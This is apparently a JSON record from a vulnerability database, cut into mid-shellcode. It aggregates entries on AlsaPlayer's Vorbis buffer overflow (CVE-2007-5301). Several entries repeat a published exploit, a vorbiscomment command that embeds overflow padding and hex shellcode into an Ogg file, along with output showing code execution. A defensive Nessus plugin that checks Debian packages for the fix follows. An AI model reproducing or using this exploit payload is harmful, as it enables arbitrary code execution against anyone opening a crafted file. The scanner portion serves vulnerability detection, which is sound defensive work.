\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-8307"}, {"lastseen": "2017-11-19T13:53:01", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65318", "id": "SSV:65318", "sourceData": "\n I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65318"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:02", "description": "\nAlsaPlayer 0.99.80-rc3 - Vorbis Input Local Buffer Overflow", "edition": 1, "published": "2008-04-10T00:00:00", "title": "AlsaPlayer 0.99.80-rc3 - Vorbis Input Local Buffer Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-10T00:00:00", "id": "EXPLOITPACK:EC45CE53D720F233296DC2F925C00A11", "href": "", "sourceData": "I have released this exploit for the alsaplayer bug CVE-2007-5301.\n\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\n\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\n\nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \n\nThen, if you plays the file with the vulnerable version:\n\nwhats@debian:~$ alsaplayer exploit.ogg\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\n\nThis was tested with the debian etch packages.\n\n- whats\n\n# milw0rm.com [2008-04-10]", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-06T09:44:59", "description": "Erik Sjolund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously crafted Vorbis file could lead to the execution of\narbitrary code.", "edition": 25, "published": "2008-04-11T00:00:00", "title": "Debian DSA-1538-1 : alsaplayer - buffer overrun", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-11T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:alsaplayer"], "id": "DEBIAN_DSA-1538.NASL", "href": "https://www.tenable.com/plugins/nessus/31808", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1538. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31808);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-5301\");\n script_xref(name:\"DSA\", value:\"1538\");\n\n script_name(english:\"Debian DSA-1538-1 : alsaplayer - buffer overrun\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Erik Sjolund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously crafted Vorbis file could lead to the execution of\narbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1538\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the alsaplayer packages.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:alsaplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-alsa\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-common\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-daemon\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-esd\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-gtk\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-jack\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-nas\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-oss\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-text\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"alsaplayer-xosd\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libalsaplayer-dev\", reference:\"0.99.76-9+etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libalsaplayer0\", reference:\"0.99.76-9+etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
